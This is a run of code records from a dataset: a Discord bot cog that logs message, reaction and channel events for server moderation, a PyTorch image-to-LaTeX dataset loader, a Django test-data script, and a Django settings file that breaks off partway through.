{datetime.utcnow()}\\nResponsible User (guess): {entry.user}')\n hit = 1\n break\n except:\n pass\n if hit == 0:\n embedVar.set_footer(text=f'Message sent at {message.created_at}\\nMessage deleted at {datetime.utcnow()}\\nResponsible User (guess): {message.author}')\n\n await logChannel.send(embed=embedVar)\n\n # Split between #message-log and #restrict-message-log\n @commands.Cog.listener()\n async def on_bulk_message_delete(self, messages):\n # Shouldn't matter if message was from bot or not\n logChannel = self.client.get_channel(messageLogID)\n result = self.checkIfRestricted(messages[0].author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictMessageLogID)\n embedVar = discord.Embed(title=f'{len(messages)} messages', description=f'A bulk message deletion occurred. {len(messages)} messages have been deleted in <#{messages[0].channel.id}>.', color=16714507)\n embedVar.set_author(name=\"Bulk Message Deletion\", icon_url=\"https://cdn.icon-icons.com/icons2/10/PNG/256/remove_delete_exit_close_1545.png\")\n for message in messages:\n embedVar.add_field(name=f'Author: {message.author}', value=f'Contents: {message.content}', inline=False)\n\n embedVar.set_footer(text=f'Messages deleted at {datetime.utcnow()}')\n await logChannel.send(embed=embedVar)\n\n # Split between #message-log and #restrict-message-log\n # BUG: Messages of length > 1024 will cause error. 
Embeds are limited to 1024 characters.\n @commands.Cog.listener()\n async def on_message_edit(self, before, after):\n if not before.author.bot:\n unknownEmbedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> has been edited. {after.jump_url}\\n Here is what we know:', color=2575039)\n unknownEmbedVar.set_author(name=\"Message Edited (Raw Data)\", icon_url=\"https://cdn.icon-icons.com/icons2/66/PNG/128/system_unknown_13010.png\")\n unknownEmbedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n unknownEmbedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n\n if before.activity != after.activity:\n unknownEmbedVar.add_field(name=\"activity changed: \", value=f'Before: {before.activity}\\nAfter: {after.activity}', inline=False)\n\n if before.application != after.application:\n unknownEmbedVar.add_field(name=\"application changed: \", value=f'Before: {before.application}\\nAfter: {after.application}', inline=False)\n\n if before.attachments != after.attachments:\n unknownEmbedVar.add_field(name=\"attachments changed: \", value=f'Before: {before.attachments}\\nAfter: {after.attachments}', inline=False)\n\n if before.channel != after.channel:\n unknownEmbedVar.add_field(name=\"channel changed: \", value=f'Before: {before.channel}\\nAfter: {after.channel}', inline=False)\n\n if before.channel_mentions != after.channel_mentions:\n unknownEmbedVar.add_field(name=\"channel_mentions changed: \", value=f'Before: {before.channel_mentions}\\nAfter: {after.channel_mentions}', inline=False)\n\n if before.created_at != after.created_at:\n unknownEmbedVar.add_field(name=\"created_at changed: \", value=f'Before: {before.created_at}\\nAfter: {after.created_at}', inline=False)\n\n if before.edited_at != after.edited_at:\n unknownEmbedVar.add_field(name=\"edited_at changed: \", value=f'Before: {before.edited_at}\\nAfter: {after.edited_at}', inline=False)\n\n if before.flags != after.flags:\n unknownEmbedVar.add_field(name=\"flags changed: \", value=f'Before: {before.flags}\\nAfter: {after.flags}', inline=False)\n\n if before.flags.value != after.flags.value:\n unknownEmbedVar.add_field(name=\"flags.value changed: \", value=f'Before: {before.flags.value}\\nAfter: {after.flags.value}', inline=False)\n\n if before.flags.is_crossposted != after.flags.is_crossposted:\n unknownEmbedVar.add_field(name=\"flags.is_crossposted changed: \", value=f'Before: {before.flags.is_crossposted}\\nAfter: {after.flags.is_crossposted}', inline=False)\n\n if before.flags.source_message_deleted != after.flags.source_message_deleted:\n unknownEmbedVar.add_field(name=\"flags.source_message_deleted changed: \", value=f'Before: {before.flags.source_message_deleted}\\nAfter: {after.flags.source_message_deleted}', inline=False)\n\n if before.flags.urgent != after.flags.urgent:\n unknownEmbedVar.add_field(name=\".flags.urgent changed: \", value=f'Before: {before.flags.urgent}\\nAfter: {after.flags.urgent}', inline=False)\n\n if before.guild != after.guild:\n unknownEmbedVar.add_field(name=\"guild changed: \", value=f'Before: {before.guild}\\nAfter: {after.guild}', inline=False)\n\n if before.id != after.id:\n unknownEmbedVar.add_field(name=\"id changed: \", value=f'Before: {before.id}\\nAfter: {after.id}', inline=False)\n\n if before.jump_url != after.jump_url:\n unknownEmbedVar.add_field(name=\"jump_url changed: \", value=f'Before: {before.jump_url}\\nAfter: {after.jump_url}', 
inline=False)\n\n if before.mention_everyone != after.mention_everyone:\n unknownEmbedVar.add_field(name=\"mention_everyone changed: \", value=f'Before: {before.mention_everyone}\\nAfter: {after.mention_everyone}', inline=False)\n\n if before.mentions != after.mentions:\n unknownEmbedVar.add_field(name=\"mentions changed: \", value=f'Before: {before.mentions}\\nAfter: {after.mentions}', inline=False)\n\n if before.nonce != after.nonce:\n unknownEmbedVar.add_field(name=\"nonce changed: \", value=f'Before: {before.nonce}\\nAfter: {after.nonce}', inline=False)\n\n if before.raw_channel_mentions != after.raw_channel_mentions:\n unknownEmbedVar.add_field(name=\"raw_channel_mentions changed: \", value=f'Before: {before.raw_channel_mentions}\\nAfter: {after.raw_channel_mentions}', inline=False)\n\n if before.raw_mentions != after.raw_mentions:\n unknownEmbedVar.add_field(name=\"raw_mentions changed: \", value=f'Before: {before.raw_mentions}\\nAfter: {after.raw_mentions}', inline=False)\n\n if before.raw_role_mentions != after.raw_role_mentions:\n unknownEmbedVar.add_field(name=\"raw_role_mentions changed: \", value=f'Before: {before.raw_role_mentions}\\nAfter: {after.raw_role_mentions}', inline=False)\n\n if before.reactions != after.reactions:\n unknownEmbedVar.add_field(name=\"reactions changed: \", value=f'Before: {before.reactions}\\nAfter: {after.reactions}', inline=False)\n\n if before.reference != after.reference:\n unknownEmbedVar.add_field(name=\"reference changed: \", value=f'Before: {before.reference}\\nAfter: {after.reference}', inline=False)\n\n if before.role_mentions != after.role_mentions:\n unknownEmbedVar.add_field(name=\"role_mentions changed: \", value=f'Before: {before.role_mentions}\\nAfter: {after.role_mentions}', inline=False)\n\n if before.stickers != after.stickers:\n unknownEmbedVar.add_field(name=\"stickers changed: \", value=f'Before: {before.stickers}\\nAfter: {after.stickers}', inline=False)\n\n if before.tts != after.tts:\n unknownEmbedVar.add_field(name=\"tts changed: \", value=f'Before: {before.tts}\\nAfter: {after.tts}', inline=False)\n\n if before.type != after.type:\n unknownEmbedVar.add_field(name=\"type changed: \", value=f'Before: {before.type}\\nAfter: {after.type}', inline=False)\n\n if before.webhook_id != after.webhook_id:\n unknownEmbedVar.add_field(name=\"webhook_id changed: \", value=f'Before: {before.webhook_id}\\nAfter: {after.webhook_id}', inline=False)\n\n logChannel = self.client.get_channel(messageLogID)\n result = self.checkIfRestricted(before.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictMessageLogID)\n\n hits = 0\n # BUG: Embeds have to be 1024 characters or less, discord allows messages of up to 2000 characters. A large messages fails to create an embed\n if before.content != after.content:\n hits += 1\n embedVar = discord.Embed(title=f'User {before.author}', description=f'{before.author.mention} Has edited a message in <#{before.channel.id}>. 
{after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Content Edited\", icon_url=\"https://cdn.icon-icons.com/icons2/624/PNG/512/Create_New-80_icon-icons.com_57345.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {after.edited_at}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Before:\", value=f'{before.content}', inline=False)\n embedVar.add_field(name=\"After:\", value=f'{after.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.embeds != after.embeds:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} in channel <#{before.channel.id}> has had embeds updated {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Embeds updated\", icon_url=\"https://cdn.icon-icons.com/icons2/909/PNG/512/embed_icon-icons.com_70979.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.pinned != after.pinned:\n if after.pinned:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just pinned. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Pinned\", icon_url=\"https://cdn.icon-icons.com/icons2/317/PNG/512/pin-icon_34381.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n else:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just unpinned. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Un-pinned\", icon_url=\"https://cdn.icon-icons.com/icons2/317/PNG/512/pin-icon_34381.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.flags.crossposted != after.flags.crossposted:\n if after.flags.crossposted:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just published. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message published\", icon_url=\"https://cdn.icon-icons.com/icons2/795/PNG/512/1-33_icon-icons.com_65689.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n else:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just un-published. 
{after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message un-published\", icon_url=\"https://cdn.icon-icons.com/icons2/795/PNG/512/1-33_icon-icons.com_65689.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.flags.suppress_embeds != after.flags.suppress_embeds:\n if after.flags.suppress_embeds:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> has just had it\\'s embeds suppressed. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message embeds suppressed\", icon_url=\"https://cdn.icon-icons.com/icons2/909/PNG/512/embed_icon-icons.com_70979.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n else:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> has just had it\\'s embeds un-suppressed. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message embeds un-suppressed\", icon_url=\"https://cdn.icon-icons.com/icons2/909/PNG/512/embed_icon-icons.com_70979.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Send raw edit data to messageLog if it hasn't been recognized above\n if hits == 0:\n await logChannel.send(embed=unknownEmbedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n @commands.Cog.listener()\n async def on_reaction_add(self, reaction, user):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(user.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {user}', description=f'{user.mention} just reacted {reaction} in channel <#{reaction.message.channel.id}>. {reaction.message.jump_url}', color=65302)\n embedVar.set_author(name=\"Reaction Made\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-green_40427.png\")\n embedVar.set_footer(text=f'Message sent at {reaction.message.created_at}\\nReaction added at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{user.avatar_url}')\n embedVar.add_field(name=\"Message contents:\", value=f'{reaction.message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n @commands.Cog.listener()\n async def on_reaction_remove(self, reaction, user):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(user.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {user}', description=f'{user.mention} just un-reacted {reaction} in channel <#{reaction.message.channel.id}>. 
{reaction.message.jump_url}', color=16714507)\n embedVar.set_author(name=\"Reaction Removed\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-red_40428.png\")\n embedVar.set_footer(text=f'Message sent at {reaction.message.created_at}\\nReaction removed at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{user.avatar_url}')\n embedVar.add_field(name=\"Message contents:\", value=f'{reaction.message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n @commands.Cog.listener()\n async def on_reaction_clear(self, message, reactions):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {message.author}', description=f'A message by {message.author.mention} in channel <#{reactions[0].message.channel.id}> has just had all reactions cleared. {reactions[0].message.jump_url}', color=16714507)\n embedVar.set_author(name=\"Reactions Cleared\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-red_40428.png\")\n embedVar.set_footer(text=f'Message sent at {reactions[0].message.created_at}\\nReactions cleared at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{message.author.avatar_url}')\n for reaction in reactions:\n embedVar.add_field(name=f'Reaction {reaction} removed', value=f'This reaction was reacted {reaction.count} time(s)', inline=False)\n embedVar.add_field(name=\"Message contents:\", value=f'{reactions[0].message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n # I have no idea how to trigger this. Maybe it is deprecated?\n @commands.Cog.listener()\n async def on_reaction_clear_emoji(self, reaction):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(reaction.message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {reaction.me}', description=f'{reaction.me.mention} just got {reaction} cleared in channel <#{reaction.message.channel.id}>. 
{reaction.message.jump_url}', color=16714507)\n embedVar.set_author(name=\"Reaction Cleared\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-red_40428.png\")\n embedVar.set_footer(text=f'Message sent at {reaction.message.created_at}\\nReaction cleared at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{reaction.me.avatar_url}')\n embedVar.add_field(name=\"Message contents:\", value=f'{reaction.message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Log to #channel-log\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel):\n embedVar = None\n if isinstance(channel, discord.CategoryChannel):\n embedVar = discord.Embed(title=f'Category {channel.name}', description=f'Category #{channel.name} was just deleted.', color=16714507)\n elif isinstance(channel, discord.TextChannel):\n embedVar = discord.Embed(title=f'Text Channel #{channel.name}', description=f'Text Channel #{channel.name} was just deleted.', color=16714507)\n elif isinstance(channel, discord.VoiceChannel):\n embedVar = discord.Embed(title=f'Voice Channel #{channel.name}', description=f'Voice #{channel.name} was just deleted.', color=16714507)\n else:\n embedVar = discord.Embed(title=f'Unknown type of Channel #{channel.name}', description=f'Unknown Channel type #{channel.name} was just deleted.', color=16714507)\n logChannel = self.client.get_channel(channelLogID)\n embedVar.set_author(name=\"Channel Deleted\", icon_url=\"https://cdn.icon-icons.com/icons2/1808/PNG/512/trash-can_115312.png\")\n embedVar.set_footer(text=f'Channel created at {channel.created_at}\\nChannel deleted at {datetime.utcnow()}')\n embedVar.add_field(name=\"Channel Category:\", value=f'{channel.category}', inline=False)\n embedVar.add_field(name=\"Channel Position:\", value=f'{channel.position}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Log to #channel-log\n @commands.Cog.listener()\n async def on_guild_channel_create(self, channel):\n embedVar = None\n if isinstance(channel, discord.CategoryChannel):\n embedVar = discord.Embed(title=f'Category {channel.name}', description=f'Category {channel.mention} was just created.', color=65302)\n elif isinstance(channel, discord.TextChannel):\n embedVar = discord.Embed(title=f'Text Channel #{channel.name}', description=f'Text Channel {channel.mention} was just created.', color=65302)\n elif isinstance(channel, discord.VoiceChannel):\n embedVar = discord.Embed(title=f'Voice Channel #{channel.name}', description=f'Voice {channel.mention} was just created.', color=65302)\n else:\n return\n\n logChannel = self.client.get_channel(channelLogID)\n embedVar.set_author(name=\"Channel created\", icon_url=\"https://cdn.icon-icons.com/icons2/1358/PNG/512/if-advantage-creation-1034354_88852.png\")\n embedVar.add_field(name=\"Channel Category:\", value=f'{channel.category}', inline=False)\n embedVar.add_field(name=\"Channel Position:\", value=f'{channel.position}', inline=False)\n perms = self.getChannelPerms(channel.overwrites)\n for perm in perms:\n if perm[1] == \"\":\n embedVar.add_field(name=f'{perm[0]}', value=f'No overwrites', inline=False)\n else:\n embedVar.add_field(name=f'{perm[0]}', value=f'{perm[1]}', inline=False)\n hit = 0\n async for entry in channel.guild.audit_logs(action=discord.AuditLogAction.channel_create):\n try:\n print('{0.user} created channel {0.target}'.format(entry))\n if entry.target == channel:\n embedVar.set_footer(text=f'Channel created at {channel.created_at}\\nResponsible User: {entry.user}')\n hit = 1\n 
break\n except:\n pass\n if hit == 0:\n embedVar.set_footer(text=f'Channel created at {channel.created_at}\\nResponsible User: Unknown')\n\n await logChannel.send(embed=embedVar)\n\n # Log to #channel-log\n @commands.Cog.listener()\n async def on_guild_channel_update(self, before, after):\n if isinstance(after, discord.CategoryChannel):\n embedVar = discord.Embed(title=f'Category {after.name}', description=f'Category {after.mention} was just updated.', color=2575039)\n elif isinstance(after, discord.TextChannel):\n embedVar = discord.Embed(title=f'Text Channel #{after.name}', description=f'Text Channel {after.mention} was just updated.', color=2575039)\n elif isinstance(after, discord.VoiceChannel):\n embedVar = discord.Embed(title=f'Voice Channel #{after.name}', description=f'Voice {after.mention} was just updated.', color=2575039)\n else:\n return\n logChannel = self.client.get_channel(channelLogID)\n embedVar.set_author(name=\"Channel updated\", icon_url=\"https://cdn.icon-icons.com/icons2/1381/PNG/512/systemsoftwareupdate_94333.png\")\n embedVar.set_footer(text=f'Channel updated at {datetime.utcnow()}\\nChannel created at {before.created_at}')\n # bitrate, category, name, NSFW, permissions, permissions_synced, position, rtc_region, slowmode, topic, type, and user_limit can all be tracked\n # Type only works for text channels, we cannot difference voice vs staging yet\n # Cannot check if forced video quality is changed either\n\n # bitrate\n try:\n if before.bitrate != after.bitrate:\n embedVar.add_field(name=\"Channel bitrate has been updated\", value=f'Before: {before.bitrate}\\nAfter: {after.bitrate}', inline=False)\n except:\n pass\n\n # category\n try:\n if before.category != after.category:\n embedVar.add_field(name=\"Channel category changed\", value=f'Before: {before.category}\\nAfter: {after.category}', inline=False)\n except:\n pass\n\n # name\n try:\n if before.name != after.name:\n embedVar.add_field(name=\"Channel name changed\", value=f'Before: {before.name}\\nAfter: {after.name}', inline=False)\n except:\n pass\n\n # is_nsfw()\n try:\n if before.is_nsfw() != after.is_nsfw():\n embedVar.add_field(name=\"Channel NSFW marking changed\", value=f'Before: {before.is_nsfw()}\\nAfter: {after.is_nsfw()}', inline=False)\n except:\n pass\n\n # overwrites\n try:\n if before.overwrites != after.overwrites:\n embedVar.add_field(name=\"Channel permissions changed\", value=f'Before: {before.bitrate}\\nAfter: {after.bitrate}', inline=False)\n # perms = self.getChannelPerms(channel.overwrites)\n except:\n pass\n\n # permissions_synced\n try:\n if before.permissions_synced != after.permissions_synced:\n embedVar.add_field(name=\"Channel synced permission status has changed\", value=f'Before: {before.permissions_synced}\\nAfter: {after.permissions_synced}', inline=False)\n except:\n pass\n\n # position\n try:\n if before.position != after.position:\n embedVar.add_field(name=\"Channel position has changed\", value=f'Before: {before.position}\\nAfter: {after.position}', inline=False)\n except:\n pass\n\n # rtc_region\n try:\n if before.rtc_region != after.rtc_region:\n embedVar.add_field(name=\"Channel region has changed\", value=f'Before: {before.rtc_region}\\nAfter: {after.rtc_region}', inline=False)\n except:\n pass\n\n # slowmode_delay\n try:\n if before.slowmode_delay != after.slowmode_delay:\n embedVar.add_field(name=\"Channel slowmode has changed\", value=f'Before: {before.slowmode_delay}\\nAfter: {after.slowmode_delay}', inline=False)\n except:\n pass\n\n # topic\n try:\n if 
before.topic != after.topic:\n embedVar.add_field(name=\"Channel topic has changed\", value=f'Before: {before.topic}\\nAfter: {after.topic}', inline=False)\n except:\n pass\n\n # type\n try:\n if before.type != after.type:\n embedVar.add_field(name=\"Channel type has changed\", value=f'Before: {before.type}\\nAfter: {after.type}', inline=False)\n except:\n pass\n\n # user_limit\n try:\n if before.user_limit != after.user_limit:\n embedVar.add_field(name=\"Voice channel max users updated\", value=f'Before: {before.user_limit}\\nAfter: {after.user_limit}', inline=False)\n except:\n pass\n\n await logChannel.send(embed=embedVar)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n if not member.bot:\n logChannel = self.client.get_channel(memberLogID)\n await logChannel.send(f'{member} has joined the server.')\n\n @commands.Cog.listener()\n async def on_member_remove(self, member):\n if not member.bot:\n logChannel = self.client.get_channel(memberLogID)\n await logChannel.send(f'{member} has left the server.')\n\n\ndef setup(client):\n client.add_cog(logs(client))\n","repo_name":"HackUCF/DiscordBot","sub_path":"cogs/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":35990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20257294507","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\nfrom skimage import io\n\n\nclass DatasetGenerator(Dataset):\n\n def __init__(self, formulas_file, root_dir, data_name,\n vocab_file, transform=None,):\n \"\"\"\n Args:\n formulas_file (String): Path to the formulas file\n root_dir (String): Directory with all the images in png format\n data_name (String): name of data split [train, test, validate]\n \"\"\"\n self.formulas = open(formulas_file, 'r').read().split('\\n')[:-1]\n self.root_dir = root_dir\n self.transform = transform\n self.data_name = data_name\n self.vocab_file = open(vocab_file, 'r').read().split('\\n')[:-1]\n\n def __len__(self):\n return len(self.formulas)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = os.path.join(self.root_dir, \"{}.png\".format(idx))\n\n image = io.imread(img_name) / 255.\n\n formula = self.formulas[idx]\n\n if self.transform:\n image = self.transform(image)\n\n sample = {'image': image, 'formula': formula}\n \n return sample\n","repo_name":"knarfamlap/img2latex","sub_path":"model/dataset_generator.py","file_name":"dataset_generator.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33908250894","text":"\n# populates database with test information\n\nfrom projects.models import Project \nfrom categories.models import Category, Group\nfrom random import randint\nfrom datetime import datetime\n\n\n# alphabet\nalpha = []\nbegin = ord('a')\nend = ord('z')\nfor num in xrange(begin, end + 1):\n\talpha.append(chr(num))\n\n# 10 groups '(0-9) group'\nfor num in range(10):\n\tgroup_name = '{0} group'.format(num)\n\tg = Group(name = group_name)\n\tg.save()\n\n# 52 categories '(A-Z) category'\n\nfor letter in alpha:\n\tgroup_num = randint(0,9)\n\tgroup_name = str(group_num) + ' group'\n\tgroup = Group.objects.get(name = group_name)\n\tcategory_name = '{0} category'.format(letter.upper())\n\tc = Category(name = category_name, group = group)\n\tc.save()\n\nfor num in range(2):\n\tfor letter in alpha:\n\t\tcat_letter = alpha[randint(0,25)].upper()\n\t\tcat_name = cat_letter + ' 
category'\n\t\tcategory = Category.objects.get(name = cat_name)\n\t\tif num == 0:\n\t\t\tproj_name = letter + ' project'\n\t\telse:\n\t\t\tproj_name = letter.upper() + ' project'\n\t\trating = randint(0,100)\n\t\tp = Project(\n\t\t\t\tname \t\t\t\t= proj_name,\n\t\t\t\tgithub_repo\t\t\t= \"wulfebw/api_test\",\n\t\t\t\tcategory\t\t\t= category,\n\t\t\t\trating\t\t\t\t= rating,\n\t\t\t\tdescription \t\t= \"desc\",\n\t\t\t\twebsite_url \t\t= \"http://www.google.com\",\n\t\t\t\tdocumentation_url \t= \"http://www.google.com\",\n\t\t\t\tbug_tracker_url\t\t= \"http://www.google.com\",\n\t\t\t\tmailing_list_url\t= \"http://www.google.com\",\n\t\t\t\tgithub_contributors\t= 2,\n\t\t\t\tgithub_watchers\t\t= 3,\n\t\t\t\tgithub_forks\t\t= 4,\n\t\t\t\tgithub_issues\t\t= 5,\n\t\t\t\tlast_commit_date\t= datetime.now(),\n\t\t\t\tfirst_commit_date\t= datetime.now(),\n\t\t\t\t)\n\t\tp.save()\n\n\n\n","repo_name":"wulfebw/OpenSourceHealth","sub_path":"pop_db.py","file_name":"pop_db.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33285362492","text":"import os\n\nimport typing as tp\n\nfrom pathlib import Path\n\nfrom datetime import timedelta\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', default='123') # type: ignore\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = bool(int(os.environ.get('DEBUG', default=0))) # type: ignore\n\n# MANAGEMENT HOSTS AND CORS\nALLOWED_HOSTS: tp.List[str] = os.environ.get('ALLOWED_HOSTS', default='').split(',') # type: ignore\nCSRF_TRUSTED_ORIGINS: tp.List[str] = os.environ.get('CSRF_TRUSTED_ORIGINS', default='').split(',') # type: ignore\nCORS_ORIGIN_ALLOW_ALL = bool(int(os.environ.get('CORS_ORIGIN_ALLOW_ALL', default=0))) # type: ignore\nif not CORS_ORIGIN_ALLOW_ALL:\n CORS_ALLOWED_ORIGINS = os.environ.get('CORS_ALLOWED_ORIGINS').split(',') # type: ignore\nCORS_ALLOW_CREDENTIALS = True\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'corsheaders',\n\n 'rest_framework',\n\n 'drf_yasg',\n\n 'api.authenticate',\n 'api.master',\n 'api.order',\n 'api.telegram_bot',\n 'api.account',\n 'api.payments',\n]\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'ommy_polland.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, \"templates\")],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'ommy_polland.wsgi.application'\n\n# Database\nSQL_ENGINE = os.environ.get(\"SQL_ENGINE\", 
default=\"django.db.backends.sqlite3\") # type: ignore\nSQL_DATABASE = os.environ.get(\"SQL_DATABASE\", default=os.path.join(BASE_DIR, \"db.sqlite3\")) # type: ignore\nSQL_USER = os.environ.get(\"SQL_USER\", default=\"user\") # type: ignore\nSQL_PASSWORD = os.environ.get(\"SQL_PASSWORD\", default=\"password\") # type: ignore\nSQL_HOST = os.environ.get(\"SQL_HOST\", default=\"localhost\") # type: ignore\nSQL_PORT = os.environ.get(\"SQL_PORT\", default=\"5432\") # type: ignore\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": SQL_ENGINE,\n \"NAME\": SQL_DATABASE,\n \"USER\": SQL_USER,\n \"PASSWORD\": SQL_PASSWORD,\n \"HOST\": SQL_HOST,\n \"PORT\": SQL_PORT,\n }\n}\n\n# Password validation\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# REST FRAMEWORK settings\nREST_FRAMEWORK = {\n 'DEFAULT_SCHEMA_CLASS': 